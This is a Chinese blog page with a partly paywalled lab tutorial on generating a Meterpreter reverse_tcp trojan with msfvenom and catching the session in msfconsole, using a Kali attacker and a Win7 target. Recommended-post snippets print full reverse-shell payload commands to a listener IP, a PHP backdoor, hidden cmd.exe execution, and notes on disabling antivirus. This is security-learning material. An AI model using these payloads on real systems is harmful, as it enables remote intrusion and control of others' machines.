后渗透通过msfconsole获取一个普通的session

最新推荐文章于 2025-09-08 14:28:12 发布
原创 最新推荐文章于 2025-09-08 14:28:12 发布 · 4.7k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过构建并利用木马程序实现从攻击机到目标机的远程连接过程。实验使用Kali作为攻击机,Win7作为目标机,通过msfvenom生成木马并借助msfconsole控制台进行监听。

最近在学后渗透,首先实验一下获取普通session
虚拟机实验环境:1.kali
2.win7
实验步骤:
1.在kali终端中打开msfconsole控制台
在这里插入图片描述
2.进入侦听模块
在这里插入图片描述
3.再次开启一个终端进行(shift+ctrl+T),查看本机ip
在这里插入图片描述
4.利用msfvenom制作木马程序
说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-f exe 生成exe格式
在这里插入图片描述
说明:这里-a 代表系统结构,需要和你的攻击机系统一样,32位的操作系统用x86,64位的操作系统用x64
–platform 平台选择windows
-p windows/meterpreter/reverse_tcp 反弹
lhost是监听主机,也就是kali的ip地址
Lport是监听端口
5.将木马传到目标主机
这里使用python -m SimpleHTTPServer 800搭

最低0.47元/天 解锁文章
22、利用Meterpreter进行后渗透测试实战
data3的博客
08-23 66
本博客详细介绍了利用Meterpreter进行后渗透测试的实战操作,包括环境准备、获取Meterpreter会话、核心操作、用户界面操作、文件传输、权限提升、令牌窃取与模拟、实现持久化等多个方面。通过具体命令和操作步骤,帮助读者掌握后渗透测试的关键技术,并提供了操作总结、注意事项、常见问题解决方案以及实战建议,旨在帮助安全研究人员和渗透测试人员更好地理解和应用Meterpreter工具。内容适用于有一定渗透测试基础的技术人员学习和参考。
22、高级网络渗透测试:后渗透阶段技术详解
ujm567890的博客
08-22 51
本文详细介绍了网络渗透测试中后渗透阶段的关键技术,包括使用Meterpreter进行核心操作、用户界面操作、文件传输、权限提升、令牌窃取与模拟、持久化设置、数据编码与渗透、中间人攻击和数据包嗅探,以及横向移动与透视等。通过这些技术,渗透测试人员可以深入挖掘和利用目标系统资源,从而全面评估系统的安全性。文章还强调了在实际操作中应遵守的法律和道德规范,确保测试的合法性和安全性。
MSF中sessions命令使用
qq_44624916的博客
11-28 7228
MSF使用
msfconsole学习
幻心的博客
07-05 3060
工具: Quasar-win AhMyth-andriod
一文带你读懂Session
最新发布
new_daimond的博客
09-08 1323
Session是Web开发中用于服务器端存储用户状态信息的机制,通过唯一SessionID实现跨请求数据共享。与Cookie相比,Session存储更安全(服务器端)、容量更大,但会占用服务器资源。其核心实现方式包括基于Cookie/URL传递SessionID,以及内存/数据库存储Session数据。分布式环境下可通过Redis或JWT实现跨域Session共享。典型应用场景包括用户登录状态管理、购物车数据存储等。
Msfconsole详细教程
weixin_65582330的博客
03-05 5215
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
关于Metasploit-学习笔记-基础命令以及参数
weixin_34190136的博客
09-13 1296
Metasploit官网 原文链接:http://www.freebuf.com/tools/67685.html1、官网内容很多,但是都是一些英文。2、有Windows平台的安装,也有Linux平台的。总之就是基于pc的安装。3、在命令行窗口输入msfconsole可以直接进入Metasploit这个工具的工作环境。4、Msfconsole的系统文件和用户文件位于/usr...
msf使用
赵花花08042的博客
05-25 1225
msf 云服务器输入msfconsole,进入msf search 查找需要模块 use 该模块 show options查看需要配置内容 命令行输入 connect www.baidu.com 80 连接百度的80端口 back退出,返回400 应该表示是通的 jobs 显示和管理作业 kill 进程 loadpath 加载模块的路径 load 加载插件 route 查看会话路由信息 系统漏洞利用过程 ~ ms08067 10. 天镜,nessuss,极光扫描器进行漏扫 11. 根据漏扫结果,去
渗透阶段之Meterpreter权限维持
鹿鸣天涯
07-15 807
meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。6.首先设置payload,需要和我们生成的木马文件的payload一致,接着设置LHOST和LPOR参数,同步生成的木马中设置的参数,并查看是否设置成功,依次执行以下命令。9.在当前的Meterpreter界面上输入?
msfconsole和msfvenom大全kali
m0_73960954的博客
06-13 1868
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口。cat 读取文件内容到屏幕。meterpreter > execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。
渗透获取普通session
ws1813004226的博客
12-29 623
渗透获取普通session 一:所需环境:1.kali Linux(攻击机) 2.windows7(靶机) 二:实验步骤:1.在kali终端使用命令msfconsole进入metasploit框架。(msf5) 2.使用命令use exploit/multi/handler进入侦听模块。 3.利用msfvenom命令生成一个shell文件。命令如下: Linux: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost= lport= -f elf
msfconsole命令大全,以及使用说明
m0_48096446的博客
07-05 6307
渗透工具 msfconsole命令大全
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1429
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
权限维持——Meterpreter后渗透阶段之关闭防火墙与杀毒软件
wy的博客
11-25 1521
meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。
msfconsole的简单使用
m0_53603468的博客
12-30 9159
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
MSF基本使用
浅笑996的博客
11-10 2789
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
msf学习笔记
qq_48257021的博客
12-20 1495
SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。
使用kali中msf制作一个网页链接点击后获取定位
07-12
我们参考用户提供的引用资料,尤其是引用[4]中关于使用Metasploit框架进行客户端渗透的示例,该示例展示了如何利用浏览器漏洞生成一个恶意网页链接。但是用户的需求是生成一个网页链接,当目标点击后可以获取其定位...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值